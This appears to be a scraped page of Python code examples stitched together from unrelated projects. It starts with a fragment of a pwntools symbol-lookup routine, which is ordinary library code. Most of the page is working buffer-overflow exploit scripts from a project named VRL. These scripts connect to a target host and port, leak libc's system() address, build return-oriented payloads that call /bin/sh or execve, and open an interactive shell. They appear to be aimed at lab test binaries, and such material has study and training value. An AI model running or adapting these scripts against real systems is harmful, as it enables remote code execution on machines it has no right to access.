        Find the address of ``symbol``, which is found in ``lib``.

        Arguments:
            symb(str): Named routine to look up
              If omitted, the base address of the library will be returned.
            lib(str): Substring to match for the library name.
              If omitted, the current library is searched.
              If set to ``'libc'``, ``'libc.so'`` is assumed.

        Returns:
            Address of the named symbol, or :const:`None`.
        """
        result = None

        if lib == 'libc':
            lib = 'libc.so'

        #
        # Get a pretty name for the symbol to show the user
        #
        if symb and lib:
            pretty = '%r in %r' % (symb, lib)
        else:
            pretty = repr(symb or lib)

        if not pretty:
            self.failure("Must specify a library or symbol")

        self.waitfor('Resolving %s' % pretty)

        #
        # If we are loading from a different library, create
        # a DynELF instance for it.
        #
        if lib is not None: dynlib = self._dynamic_load_dynelf(lib)
        else: dynlib = self

        if dynlib is None:
            log.failure("Could not find %r" % lib)
            return None

        #
        # If we are resolving a symbol in the library, find it.
        #
        if symb and self.libcdb:
            # Try a quick lookup by build ID
            self.status("Trying lookup based on Build ID")
            build_id = dynlib._lookup_build_id(lib=lib)
            if build_id:
                log.info("Trying lookup based on Build ID: %s" % build_id)
                path = libcdb.search_by_build_id(build_id)
                if path:
                    with context.local(log_level='error'):
                        e = ELF(path)
                        e.address = dynlib.libbase
                        result = e.symbols[symb]
        if symb and not result:
            self.status("Trying remote lookup")
            result = dynlib._lookup(symb)
        if not symb:
            result = dynlib.libbase

        #
        # Did we win?
        #
        if result: self.success("%#x" % result)
        else: self.failure("Could not find %s" % pretty)

        return result
Example #41
0
    def run(self):
        if self.options['architecture'] == 'amd64':
            if self.options['static'] == 'False':
                '''Run your exploit here, if this script could success, the VRL can run it.
        When the exploit run, follow the options.'''

                p = remote(self.options['dIP'], int(self.options['port']))

                #a = raw_input('input: ')

                #set /bin/sh ASCII
                binsh = p32(0x6e69622f) + p32(0x0068732f)

                #set payload
                payload = 'a' * (self.property['offset'] - 8) + binsh + p32(
                    self.property['limit']) + p32(
                        self.property['choose']) + p64(
                            self.property['p']) + p64(self.property['q'])
                #send payload
                p.sendline(payload)
                #recv
                recv_data = p.recv()
                print 'rev1: ' + recv_data

                #set payload
                payload = 'a' * (self.property['offset'] - 8) + binsh + p32(
                    self.property['limit']) + p32(self.property['choose'])
                #send payload
                p.sendline(payload)
                #recv  get new sysaddress here
                recv_data = p.recvline()
                print 'rev2: ' + recv_data
                self.property['sysaddress'] = int(recv_data, 16)
                print "sysaddress = " + hex(self.property['sysaddress'])

                libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
                #get /bin/sh offset
                binsh_addr_offset = next(
                    libc.search('/bin/sh')) - libc.symbols['system']
                print "binsh_addr_offset = " + hex(binsh_addr_offset)
                #get /bin/sh address
                binsh_addr = self.property['sysaddress'] + binsh_addr_offset
                print "binsh_addr = " + hex(binsh_addr)

                #set payload
                self.property['choose'] = 2
                self.property['p'] = 0x601098
                self.property['q'] = 0x7fffffffdc78
                payload = 'a' * (self.property['offset'] - 8) + p64(
                    self.property['sysaddress']) + p32(
                        self.property['limit']) + p32(
                            self.property['choose']) + p64(
                                self.property['p']) + p64(self.property['q'])
                #send payload
                p.sendline(payload)
                #recv
                recv_data = p.recvline()
                print 'rev3: ' + recv_data

                #set payload
                self.property['choose'] = 2
                self.property['p'] = 0x60109c
                self.property['q'] = 0x7fffffffdc7c
                payload = 'a' * (self.property['offset'] - 8) + p64(
                    self.property['sysaddress']) + p32(
                        self.property['limit']) + p32(
                            self.property['choose']) + p64(
                                self.property['p']) + p64(self.property['q'])
                #send payload
                p.sendline(payload)
                #recv
                recv_data = p.recvline()
                print 'rev4: ' + recv_data

                #set payload
                self.property['limit'] = 0
                self.property['choose'] = 3
                self.property['p'] = 0x601070
                self.property['q'] = 0x601078
                payload = binsh + 'a' * (self.property['offset'] - 8) + p32(
                    self.property['limit']) + p32(
                        self.property['choose']) + p64(
                            self.property['p']) + p64(self.property['q'])
                #send payload
                p.sendline(payload)

                print 'interactive'
                p.interactive()

            else:
                print 'static'
        elif self.options['architecture'] == 'i386':

            if self.options['static'] == 'False':
                print 'dl'

            else:
                print 'static'

        else:
            print 'Unrecognized architecture, stop.'
            return
Example #42
0
 def from_blob(blob, *a, **kw):
     return ROP(ELF.from_bytes(blob, *a, **kw))
Example #43
0
File: run32.py Project: sucof/VRL
    def run(self):
        if self.options['static'] == 'False':
            '''Run your exploit here, if this script could success, the VRL can run it.
        When the exploit run, follow the options.'''
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((self.options['dIP'], int(self.options['port'])))

            #get new sysaddress here
            s.send("a")  #any string
            recv_data = s.recv(8)
            self.property['sysaddress'] = int(recv_data, 16)
            libc = ELF('/lib32/libc.so.6')
            print "sysaddress = " + hex(self.property['sysaddress'])

            #get /bin/sh offset
            binsh_addr_offset = next(
                libc.search('/bin/sh')) - libc.symbols['system']
            print "binsh_addr_offset = " + hex(binsh_addr_offset)

            #get ret offset
            pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
            pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
            pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
            pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
            pop_ret5_offset = self.property['ret5'] - libc.symbols['system']

            #get /bin/sh address
            binsh_addr = self.property['sysaddress'] + binsh_addr_offset

            #get ret address
            pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
            pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
            pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
            pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
            pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
            #pop_ret5_addr =pop_ret4_addr - 2

            #set payload
            payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(
                binsh_addr) + p32(pop_ret2_addr) + p32(pop_ret3_addr) + p32(
                    self.property['data1']) + p32(pop_ret4_addr) + p32(
                        self.property['data2']) + p32(
                            self.property['data3']) + p32(pop_ret5_addr)

            print "\n##########sending payload##########\n"
            s.send(payload)
            s.close()
        else:
            self.property = {
                'ret1': 0x0000000000401696,  # gadget address in libc
                'ret2': 0x00000000004264af,
                'ret3': 0x00000000004c26e8,
                'ret4': 0x0000000000442fe9,
                'ret5': 0x0000000000467685,
                'data1': 0x000000000000003b,  #execv systemcall number
                'data2': 0x0000000000000000,
                'data3': 0x0000000000000000,
                'offset': 24,  # offset
                'sysaddress': 0x0
            }  # system function address, initialize 0

            self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((self.options['dIP'], int(self.options['port'])))

            libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')

            #get  sysaddress here
            self.property['sysaddress'] = libc.symbols['system']
            print "sysaddress = " + hex(self.property['sysaddress'])

            #get /bin/sh address
            binsh_addr = next(libc.search('/bin/sh'))

            #get ret address
            pop_ret1_addr = self.property['ret1']
            pop_ret2_addr = self.property['ret2']
            pop_ret3_addr = self.property['ret3']
            pop_ret4_addr = self.property['ret4']
            pop_ret5_addr = self.property['ret5']

            #set payload
            payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(
                binsh_addr) + p64(pop_ret2_addr) + p64(pop_ret3_addr) + p64(
                    self.property['data1']) + p64(pop_ret4_addr) + p64(
                        self.property['data2']) + p64(
                            self.property['data3']) + p64(pop_ret5_addr)

            print "\n##########sending payload##########\n"
            s.send(payload)
            s.close()